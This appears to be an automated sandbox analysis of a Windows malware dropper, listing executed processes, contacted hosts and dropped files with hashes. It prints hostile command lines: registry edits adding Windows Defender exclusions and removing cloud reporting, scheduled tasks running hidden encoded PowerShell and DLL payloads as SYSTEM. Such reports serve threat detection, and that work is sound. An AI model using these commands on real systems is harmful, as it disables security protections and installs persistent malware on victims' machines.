C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LCifMpYymZWU2" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gbPxNkbXHfUn" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gbPxNkbXHfUn" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mVqQIGUXDOgrC" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mVqQIGUXDOgrC" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yucluTmaHGGxjmhxbXR" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yucluTmaHGGxjmhxbXR" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yvWovCiVU" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yvWovCiVU" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\WkkDuRgYrrqHXcVB /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\WkkDuRgYrrqHXcVB /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\IzRZTwSZebgYVSAl /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\IzRZTwSZebgYVSAl /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gMvUkTVLF" /SC once /ST 01:37:33 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gMvUkTVLF"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gMvUkTVLF"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "mRaseIvrfxDtBOYKW" /SC once /ST 10:59:43 /RU "SYSTEM" /TR "\"C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\gMqqyxU.exe\" Ty /Pisite_idaaw 385118 /S" /V1 /F
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "mRaseIvrfxDtBOYKW"
C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\gMqqyxU.exe
C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\gMqqyxU.exe Ty /Pisite_idaaw 385118 /S
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "bdnnguwcOLBYKAjbbA"
C:\Windows\SysWOW64\cmd.exe
cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
C:\Windows\SysWOW64\reg.exe
REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
C:\Windows\SysWOW64\cmd.exe
cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
C:\Windows\SysWOW64\reg.exe
REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\yvWovCiVU\jplHxo.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "eGwAoTnpAObQfPU" /V1 /F
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "eGwAoTnpAObQfPU2" /F /xml "C:\Program Files (x86)\yvWovCiVU\UnqLSRy.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "eGwAoTnpAObQfPU"
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "eGwAoTnpAObQfPU"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "ALvbXdfFiQJKEp" /F /xml "C:\Program Files (x86)\LCifMpYymZWU2\NANOZXe.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "BIiSjOILpRnDn2" /F /xml "C:\ProgramData\WkkDuRgYrrqHXcVB\UlQFaef.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "uCAhUOuaRBfXDMltv2" /F /xml "C:\Program Files (x86)\yucluTmaHGGxjmhxbXR\tnLDIQD.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "cLzKLCJHWfKFSkdKasF2" /F /xml "C:\Program Files (x86)\mVqQIGUXDOgrC\feITmxR.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "FTXCzbcEvROqagNdd" /SC once /ST 11:38:10 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\IzRZTwSZebgYVSAl\SeazvxRp\pGucmuk.dll\",#1 /pvsite_idqjm 385118" /V1 /F
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "FTXCzbcEvROqagNdd"
C:\Windows\system32\rundll32.EXE
C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\IzRZTwSZebgYVSAl\SeazvxRp\pGucmuk.dll",#1 /pvsite_idqjm 385118
C:\Windows\SysWOW64\rundll32.exe
C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\IzRZTwSZebgYVSAl\SeazvxRp\pGucmuk.dll",#1 /pvsite_idqjm 385118
C:\Windows\SysWOW64\cmd.exe
cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32
C:\Windows\SysWOW64\reg.exe
REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32
C:\Windows\SysWOW64\cmd.exe
cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "FTXCzbcEvROqagNdd"
C:\Windows\SysWOW64\reg.exe
REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "mRaseIvrfxDtBOYKW"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | yip.su | udp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 104.20.68.143:443 | pastebin.com | tcp |
| US | 188.114.97.2:443 | shipofdestiny.com | tcp |
| DE | 185.172.128.144:80 | 185.172.128.144 | tcp |
| RU | 193.233.132.175:80 | tcp | |
| AT | 5.42.64.17:80 | 5.42.64.17 | tcp |
| US | 8.8.8.8:53 | sty.ink | udp |
| US | 8.8.8.8:53 | cu82342.tw1.ru | udp |
| US | 8.8.8.8:53 | namemail.org | udp |
| US | 8.8.8.8:53 | net.geo.opera.com | udp |
| US | 104.21.13.170:443 | sty.ink | tcp |
| US | 104.21.13.170:443 | sty.ink | tcp |
| US | 104.21.15.5:443 | operandotwo.com | tcp |
| NL | 185.26.182.111:80 | net.geo.opera.com | tcp |
| US | 188.114.96.2:443 | lawyerbuyer.org | tcp |
| US | 188.114.96.2:443 | lawyerbuyer.org | tcp |
| RU | 176.57.210.144:443 | cu82342.tw1.ru | tcp |
| NL | 185.26.182.111:443 | net.geo.opera.com | tcp |
| US | 188.114.97.2:443 | lawyerbuyer.org | tcp |
| US | 188.114.97.2:443 | lawyerbuyer.org | tcp |
| US | 172.67.173.167:443 | guseman.org | tcp |
| DE | 185.172.128.90:80 | 185.172.128.90 | tcp |
| FR | 95.164.45.22:443 | d.392391234.xyz | tcp |
| FR | 95.164.45.22:443 | d.392391234.xyz | tcp |
| US | 8.8.8.8:53 | 111.182.26.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.45.164.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 144.210.57.176.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 167.173.67.172.in-addr.arpa | udp |
| DE | 185.172.128.65:80 | tcp | |
| DE | 185.172.128.65:80 | tcp | |
| US | 8.8.8.8:53 | herdbescuitinjurywu.shop | udp |
| US | 104.21.69.91:443 | tcp | |
| DE | 185.172.128.144:80 | tcp | |
| DE | 185.172.128.209:80 | tcp | |
| US | 104.21.69.91:443 | tcp | |
| US | 104.21.69.91:443 | tcp | |
| NL | 82.145.216.20:443 | tcp | |
| NL | 82.145.216.20:443 | tcp | |
| NL | 82.145.217.121:443 | tcp | |
| US | 104.21.69.91:443 | tcp | |
| US | 104.18.11.89:443 | tcp | |
| NL | 82.145.217.121:443 | desktop-netinstaller-sub.osp.opera.software | tcp |
| NL | 185.26.182.117:443 | tcp | |
| US | 8.8.8.8:53 | 904260d0-cc15-485d-9794-c8e6df526d0c.uuid.datadumpcloud.org | udp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| CH | 172.217.210.127:19302 | stun4.l.google.com | udp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| BG | 185.82.216.104:443 | server1.datadumpcloud.org | tcp |
| US | 104.21.94.82:443 | carsalessystem.com | tcp |
| BG | 185.82.216.104:443 | server1.datadumpcloud.org | tcp |
| NL | 82.145.216.16:443 | tcp | |
| BG | 185.82.216.104:443 | server1.datadumpcloud.org | tcp |
| US | 8.8.8.8:53 | udp | |
| N/A | 104.21.76.57:443 | tcp | |
| N/A | 46.226.167.187:80 | tcp | |
| US | 172.67.75.163:443 | tcp | |
| US | 34.117.186.192:443 | tcp | |
| DE | 185.172.128.65:80 | tcp | |
| US | 3.80.150.121:443 | service-domain.xyz | tcp |
| GB | 142.250.179.238:443 | clients2.google.com | tcp |
| GB | 142.250.178.1:443 | clients2.googleusercontent.com | tcp |
| US | 8.8.8.8:53 | 1.178.250.142.in-addr.arpa | udp |
| GB | 142.250.179.238:443 | clients2.google.com | tcp |
| US | 44.240.147.44:80 | api3.check-data.xyz | tcp |
Files
memory/4932-0-0x0000026F19630000-0x0000026F1963C000-memory.dmp
memory/4932-1-0x00007FF9263E0000-0x00007FF926EA2000-memory.dmp
memory/4932-2-0x0000026F1B3E0000-0x0000026F1B3F0000-memory.dmp
memory/4932-3-0x0000026F34AC0000-0x0000026F34B36000-memory.dmp
memory/4932-4-0x0000026F1B360000-0x0000026F1B37E000-memory.dmp
memory/4932-5-0x0000026F33DD0000-0x0000026F33E2E000-memory.dmp
memory/4932-6-0x0000026F1B3E0000-0x0000026F1B3F0000-memory.dmp
memory/4932-7-0x0000026F1B3E0000-0x0000026F1B3F0000-memory.dmp
memory/576-8-0x0000000000400000-0x0000000000408000-memory.dmp
memory/576-9-0x0000000074C30000-0x00000000753E1000-memory.dmp
memory/576-10-0x0000000005840000-0x0000000005850000-memory.dmp
memory/4932-11-0x00007FF9263E0000-0x00007FF926EA2000-memory.dmp
C:\Users\Admin\Pictures\1oFgcxPIGUVuycnjygIX7D3k.exe
| MD5 | 5b423612b36cde7f2745455c5dd82577 |
| SHA1 | 0187c7c80743b44e9e0c193e993294e3b969cc3d |
| SHA256 | e0840d2ea74a00dcc545d770b91d9d889e5a82c7bedf1b989e0a89db04685b09 |
| SHA512 | c26a1e7e96dbd178d961c630abd8e564ef69532f386fb198eb20119a88ecab2fe885d71ac0c90687c18910ce00c445f352a5e8fbf5328f3403964f7c7802414c |
C:\Users\Admin\Pictures\YTL0PmmS83SCp78qfDgfizjt.exe
| MD5 | 9cd8f017fce108d15a3da05ad68dc88d |
| SHA1 | 8a934caca9bc4aae78caf22ffb40fa52d0539bd2 |
| SHA256 | 41cfcd320e71a9703685c95859dec2262cc459c3a5d6d4e2e4379d8f9695c854 |
| SHA512 | bd6fbdab2e4a67f09afb5c88441410ff5efa567da2ae0089da210f68f79e87ac7b04da43e710ec4fcf25ceef28dc13bcdff6335f37e35017f6b0039c53c4dc5b |
memory/3868-38-0x0000000000D80000-0x0000000000DEE000-memory.dmp
memory/3868-37-0x0000000000E20000-0x0000000000F20000-memory.dmp
memory/3868-39-0x0000000000400000-0x0000000000B0D000-memory.dmp
C:\Users\Admin\Pictures\fYmZfMjQZC7bcgTgxzU4okLP.exe
| MD5 | c4557771f0454d0924cff29fe81f2fb1 |
| SHA1 | 905dfbc56726538788fde25dfc364509b220f3f3 |
| SHA256 | c8dba8d9f5446614284942a20ccc34a939be7ef2183f7da8e89ed4848a11cbaf |
| SHA512 | 5822384e112b7c92e1d0c2bf3d4b6017f0560c8f6fa0608881e7bd3f04acd8eab9a02df6ae8c13c22cd813aabbc6137cd27c0f72d847c0ac526a0fd7dd562e43 |
memory/1164-57-0x0000000002DD0000-0x00000000031CD000-memory.dmp
C:\Users\Admin\Pictures\wwBOAPkgANJgdWjG6GOEj92T.exe
| MD5 | 4add431a81cb545cfea57bbd47fc0a7d |
| SHA1 | b3352a665e4ad3602602fa0ead723beab02d32ae |
| SHA256 | 1ceccedb81243395fda6d5fac63d746b431631f131690496522567081e4bb977 |
| SHA512 | be7dd55fd5832a1f31f1244a396b36ba9af9d0f9db83f571ef61651d70b1db9e2853094aa96cfce6ddd70276d20c46afd68cbd8a2882cf3f8572ee3845471420 |
memory/1164-65-0x00000000031D0000-0x0000000003ABB000-memory.dmp
memory/1164-81-0x0000000000400000-0x0000000000ECD000-memory.dmp
C:\Users\Admin\Pictures\MQRy5a2TwXi0WZTzeI0qoVpB.exe
| MD5 | 7960d8afbbac06f216cceeb1531093bb |
| SHA1 | 008221bf66a0749447cffcb86f2d1ec80e23fc76 |
| SHA256 | f6e476e8ccb571b9d7a76234953ad428e883ff4712b0062498ba3275d9749b84 |
| SHA512 | 35d12e81eb892aeb2237049beca61a81469dea5b1c9b7a0b9f49fbf95a95c756509d9e76c732fb10b504f9f9692e1fbe83ea2fd09d791f793a928c01974b8147 |
memory/4996-83-0x0000000002BD0000-0x0000000002FCD000-memory.dmp
memory/3156-95-0x0000000000CB0000-0x0000000000D1E000-memory.dmp
memory/4996-100-0x0000000000400000-0x0000000000ECD000-memory.dmp
memory/4996-101-0x00000000030D0000-0x00000000039BB000-memory.dmp
C:\Users\Admin\Pictures\D5DiMuAoMYdqs3uIyHVh2vxp.exe
| MD5 | e2a6c1f58b137874e490b8d94382fcdb |
| SHA1 | 71529c5d708091b1e1a580227dc52e62a140edd1 |
| SHA256 | 4801879a7afb9d03f7edcbe76cd9306cb024d80abc8512c4995aa97e8fd52437 |
| SHA512 | 24d12ce668e5189a4ba80520a4eaf480d17d3a07d8d0d4312964968f8489143df225881ec70e39e0c62e381061626801ead72d70cea164e2c3870bfbd7bc4eff |
memory/3156-113-0x0000000074C30000-0x00000000753E1000-memory.dmp
memory/4568-121-0x0000000002BB0000-0x0000000002FAC000-memory.dmp
memory/576-120-0x0000000074C30000-0x00000000753E1000-memory.dmp
memory/3752-123-0x0000000000E90000-0x0000000000F90000-memory.dmp
memory/3752-124-0x0000000002830000-0x000000000287A000-memory.dmp
memory/3208-122-0x0000000000400000-0x000000000046D000-memory.dmp
memory/3208-128-0x0000000000400000-0x000000000046D000-memory.dmp
memory/3752-129-0x0000000000400000-0x0000000000B06000-memory.dmp
memory/3752-130-0x0000000000E70000-0x0000000000E71000-memory.dmp
memory/3868-131-0x0000000000E20000-0x0000000000F20000-memory.dmp
memory/3156-115-0x0000000005640000-0x0000000005650000-memory.dmp
memory/3156-132-0x0000000003060000-0x0000000005060000-memory.dmp
memory/576-133-0x0000000005840000-0x0000000005850000-memory.dmp
memory/4568-134-0x0000000000400000-0x0000000000ECD000-memory.dmp
memory/3208-135-0x0000000000400000-0x000000000046D000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\u2zg.0.exe
| MD5 | ab1dbed7cd6c1bf01ab77d12d1b86cd8 |
| SHA1 | ccfd0f691e8e75ed0fb9a436032167cc633ce68b |
| SHA256 | b5389bf868f62fcbdebccd4a8014ab6b3c0164de09913f34d6fa18f36cbcb1a5 |
| SHA512 | 1f83592156ee5479024aad34b1f856826c869758172d44b5d3052cf7b076ece37fde55a1d6ec572aceeac13172b48c65733c008f066fade447ec807837d26587 |
memory/3156-144-0x0000000074C30000-0x00000000753E1000-memory.dmp
memory/3752-147-0x0000000003250000-0x0000000003350000-memory.dmp
memory/3752-148-0x0000000003250000-0x0000000003350000-memory.dmp
memory/3752-151-0x0000000003250000-0x0000000003350000-memory.dmp
memory/3752-152-0x0000000003250000-0x0000000003350000-memory.dmp
memory/3752-153-0x0000000003250000-0x0000000003350000-memory.dmp
memory/3752-149-0x0000000003250000-0x0000000003350000-memory.dmp
memory/3752-154-0x0000000003250000-0x0000000003350000-memory.dmp
memory/3752-155-0x0000000003250000-0x0000000003350000-memory.dmp
memory/3752-156-0x0000000003250000-0x0000000003350000-memory.dmp
memory/3752-158-0x0000000003250000-0x0000000003350000-memory.dmp
memory/3752-157-0x0000000003250000-0x0000000003350000-memory.dmp
memory/3752-161-0x0000000003250000-0x0000000003350000-memory.dmp
memory/3752-163-0x0000000003250000-0x0000000003350000-memory.dmp
memory/3752-162-0x0000000003250000-0x0000000003350000-memory.dmp
memory/3752-166-0x0000000003250000-0x0000000003350000-memory.dmp
memory/3752-176-0x0000000003250000-0x0000000003350000-memory.dmp
memory/3752-180-0x0000000003250000-0x0000000003350000-memory.dmp
memory/3752-179-0x0000000003250000-0x0000000003350000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\u2zg.1.exe
| MD5 | eee5ddcffbed16222cac0a1b4e2e466e |
| SHA1 | 28b40c88b8ea50b0782e2bcbb4cc0f411035f3d5 |
| SHA256 | 2a40e5dccc7526c4982334941c90f95374460e2a816e84e724e98c4d52ae8c54 |
| SHA512 | 8f88901f3ebd425818db09f268df19ccf8a755603f04e9481bcf02b112a84393f8a900ead77f8f971bfa33fd9fa5636b7494aaee864a0fb04e3273911a4216dc |
memory/3752-182-0x0000000003250000-0x0000000003350000-memory.dmp
memory/3752-183-0x0000000003350000-0x0000000003390000-memory.dmp
memory/3752-184-0x0000000003350000-0x0000000003390000-memory.dmp
memory/3752-185-0x0000000003350000-0x0000000003390000-memory.dmp
memory/3752-186-0x0000000003350000-0x0000000003390000-memory.dmp
memory/3752-181-0x0000000003250000-0x0000000003350000-memory.dmp
memory/3208-189-0x0000000003870000-0x0000000003C70000-memory.dmp
memory/3208-191-0x0000000003870000-0x0000000003C70000-memory.dmp
memory/3752-170-0x0000000003250000-0x0000000003350000-memory.dmp
memory/3752-165-0x0000000003250000-0x0000000003350000-memory.dmp
memory/3752-164-0x0000000003250000-0x0000000003350000-memory.dmp
memory/3752-160-0x0000000003250000-0x0000000003350000-memory.dmp
memory/3868-193-0x0000000000400000-0x0000000000B0D000-memory.dmp
memory/3208-194-0x00007FF947240000-0x00007FF947449000-memory.dmp
memory/3752-159-0x0000000003250000-0x0000000003350000-memory.dmp
C:\Users\Admin\Pictures\b04vaIYl7t9GKnLT4gGKsr1W.exe
| MD5 | e4f6256be5ad3ef5f3925ff1099b35c4 |
| SHA1 | 36e437116f5724b934b0a6cb9a5c94da5a705dbd |
| SHA256 | bc54eb848951076dd8a1d2d0f7f168d51c16628ff0a2e97dca9258d23936c4f1 |
| SHA512 | 81b8de75dbcafd47dcc2323c9d483600bf2b811b3929b30100fe51955cf775db2f74dac22152158ce4ef8704a6acb95c653c5e463841149bf6c05995891115a6 |
memory/3208-209-0x0000000077010000-0x0000000077262000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Opera_installer_2403281421249623460.dll
| MD5 | 2c8ab707b79399f1cbaf2cd17003d614 |
| SHA1 | 034bd6bbd7123627ca202b6b35b9018261fc03d5 |
| SHA256 | c8cbcc07e14d8e019e5927126fb5ff30ec1d77f9f351d5738b73c228f02eaede |
| SHA512 | d0f559744068666b3d3cfe9db4ea00ee40a5cc9ab70dfa095c3cbb19dd2fff13746db1bec814ce4faff6df6ebaaa39af62e7e55dd43bea5be6ef356a9c127888 |
memory/2380-212-0x0000000000A40000-0x0000000000A49000-memory.dmp
memory/2380-228-0x00000000028E0000-0x0000000002CE0000-memory.dmp
memory/2380-231-0x00007FF947240000-0x00007FF947449000-memory.dmp
memory/2380-237-0x0000000077010000-0x0000000077262000-memory.dmp
memory/1308-257-0x0000000061E00000-0x0000000061EF3000-memory.dmp
C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports\settings.dat
| MD5 | 888658cfb65bb010923db299d8f2488b |
| SHA1 | 4b6a8d8fb0a4a8d7a3e3b71ed769e7355cf35d42 |
| SHA256 | c5599d3744ba20da4ec9201857d18529d14018b7a796b1b373c61b87ccd49ebf |
| SHA512 | f10da0f5e8a20dfd6e379a60ba00f9de6f80908287267410dad4c2c541efb023bf0e26164b76aa3ff4b9c1668e991331be23bae8823ce28729a96ca292f38fcf |
C:\Users\Admin\AppData\Roaming\Temp\Task.bat
| MD5 | 11bb3db51f701d4e42d3287f71a6a43e |
| SHA1 | 63a4ee82223be6a62d04bdfe40ef8ba91ae49a86 |
| SHA256 | 6be22058abfb22b40a42fb003f86b89e204a83024c03eb82cd53e2a0a047c331 |
| SHA512 | 907ad2c070cc1db89f43459a94d7f48985d939d749c9648b78572a266f0d3fde47813a129e9151dbf4a7d96d36f588172f57c88b8b947b56ed818d7d068abab2 |
memory/3752-388-0x0000000000400000-0x0000000000B06000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bcbs4eka.i1d.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\Pictures\oGKQq6EzTV5MSsy1lks4vpiG.exe
| MD5 | aaab26342c7e93c5b29fcaec60dd84d9 |
| SHA1 | a02b822ee13767ca224a37494adda8ad3b34db92 |
| SHA256 | 30b64050f5874a74cb1ddc70578c6c30d70edd4d43f8b91f4597aa3d1a405648 |
| SHA512 | ad01fdbac1fa2b3ccf62d4c76d458bb5288a6e1664a6188417e5872104474567765ff364e66c5a66d350f921c542a43fde1ba301af60b76bac35d0c7541c9097 |
memory/1164-455-0x0000000000400000-0x0000000000ECD000-memory.dmp
memory/4996-461-0x0000000000400000-0x0000000000ECD000-memory.dmp
memory/4568-475-0x0000000000400000-0x0000000000ECD000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zS83D6.tmp\Install.exe
| MD5 | 19024664b4bd6c49e4d898317b4a2a33 |
| SHA1 | f6d8c538ab5444df258ffd2d958bd4db65997bd9 |
| SHA256 | 11b47b3d9cf14562aabfaa2e4e9e67ebbb00fb3e31f9f44f148d03cd3fc3da37 |
| SHA512 | 2d0f64c5ca2e1ea9af44e5c7b836efe7d02feb29915f148ce2e69ab70435a57dbe15f26a2e096d414f1cdad87066c8486397cf3de982afbe1aea74bc4def0475 |
C:\Users\Admin\Pictures\gqaPwdJNBuiwAUU5K6wLgvi5.exe
| MD5 | 4204b9d4c4df5c4b4d67922db24f342a |
| SHA1 | 9255b5e94028f3f55adda2576d60bd39452eaf08 |
| SHA256 | 62cd7b447bdee3ec1670c92d9585e1fddbaa5d4ee824dee8f15940005bf95414 |
| SHA512 | 0b4ed4d6397c9f34cf2c72d9c581a6e5d94eabf395da0010073b1600883dac6fcc48c1606ffee29952bd60707caf03b8a6d6cf644b2ac668306b4a418d726423 |
C:\Users\Admin\AppData\Local\Temp\7zS87BE.tmp\Install.exe
| MD5 | 66519dfed8038223f1ccb932d262b955 |
| SHA1 | 5a39adfed9c341dbef59ebeaf2a809c1828455e9 |
| SHA256 | 85e1db4a1b746961645322eb14946d684f16f06a1404623bacd1eae786b67b54 |
| SHA512 | 870089673509813398ad67e022b276659b53eea27ca7ee4f0692d0b6588ee0fc8ee3436c98db569773061dc788cc8a28bcb746aa3680dee752d0d062a54c7d2d |
memory/4744-530-0x00007FF7E3BC0000-0x00007FF7E4621000-memory.dmp
memory/4744-532-0x00007FF7E3BC0000-0x00007FF7E4621000-memory.dmp
memory/4744-533-0x00007FF7E3BC0000-0x00007FF7E4621000-memory.dmp
memory/4744-535-0x00007FF7E3BC0000-0x00007FF7E4621000-memory.dmp
memory/4744-534-0x00007FF7E3BC0000-0x00007FF7E4621000-memory.dmp
memory/4744-536-0x00007FF7E3BC0000-0x00007FF7E4621000-memory.dmp
memory/1308-538-0x0000000000400000-0x0000000000AEA000-memory.dmp
memory/4744-537-0x00007FF7E3BC0000-0x00007FF7E4621000-memory.dmp
C:\Windows\System32\GroupPolicy\gpt.ini
| MD5 | 8ef9853d1881c5fe4d681bfb31282a01 |
| SHA1 | a05609065520e4b4e553784c566430ad9736f19f |
